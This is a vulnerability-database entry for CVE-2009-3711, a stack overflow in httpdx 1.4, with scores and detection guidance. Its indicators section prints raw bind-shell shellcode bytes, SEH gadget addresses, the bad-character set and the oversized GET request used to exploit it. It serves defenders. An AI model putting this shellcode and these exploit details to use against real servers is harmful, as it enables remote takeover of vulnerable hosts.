cbcvebase.
CVE-2009-3711
published 2009-10-16

CVE-2009-3711: Stack-based buffer overflow in the h_handlepeer function in http.cpp in httpdx 1.4, and possibly 1.4.3, allows remote attackers to cause a denial of service…

PriorityP265critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
63.91%
99.1th percentile
Stack-based buffer overflow in the h_handlepeer function in http.cpp in httpdx 1.4, and possibly 1.4.3, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request.

Affected

2 ranges
VendorProductVersion rangeFixed in
jasperhttpdx
jasperhttpdx

Detection & IOCsextracted from sources · hover to see the quote

commandGET /abc=AAAA...A HTTP/1.1 Host: 192.168.2.1
port58821
other0x63b81a07
other0x63b80131
pathhttpdx_src/http.cpp
bytes
\x89\xE5\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06\x6A\x01\x6A\x02\xB8\x6A\x8B\xAB\x71\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8\x80\x44\xAB\x71\xFF\xD0\x6A\x01\x53\xB8\xD3\x8C\xAB\x71\xFF\xD0\x33\xC0\x50\x50\x53\xB8\x40\x10\xAC\x71\xFF\xD0\x8B\xD8\xBA\x7B\xD3\x81\x7C\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63\x6D\x64\x8D\x45\xFC\x50\xB8\xC7\x93\xC2\x77\xFF\xD0\x31\xC0\x50\xB8\x12\xCB\x81\x7C\xFF\xD0
  • Detect exploitation attempts by matching HTTP GET requests with abnormally long URI paths (>476 bytes) sent to httpdx servers, consistent with buffer overflow padding.
  • Fingerprint vulnerable httpdx server via User-Agent/Server banner matching pattern /httpdx\/.* \(Win32\)/ — the Metasploit check method uses this to confirm vulnerability.
  • Monitor for outbound connections on port 58821 from the httpdx process after receiving a malformed GET request — this is the port opened by the exploit's bind shellcode.
  • The exploit sets VHOST to an empty string and sends a crafted sploit URI; detect empty Host headers combined with oversized GET URIs targeting httpdx.
  • The bad characters for payload encoding are \x00\x0a\x0d\x20\x25\x2e\x2f\x3f\x5c — use these to tune IDS rules to avoid false negatives on encoded variants.
  • The overflow occurs in the strcpy call copying client->filereq into a stack buffer; look for SEH-based exploitation patterns (pop/pop/ret gadget at 0x63b81a07 in n.dll) in memory forensics.
  • ·The Metasploit module targets only Windows platforms (XP SP3 and 2003 SP2 English); the SEH ROP gadget addresses (0x63b81a07, 0x63b80131) are specific to n.dll on those OS versions and will differ on other builds.
  • ·The NVD entry notes httpdx 1.4.3 may also be vulnerable ('possibly 1.4.3'), so detection should not be limited to version 1.4 only.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.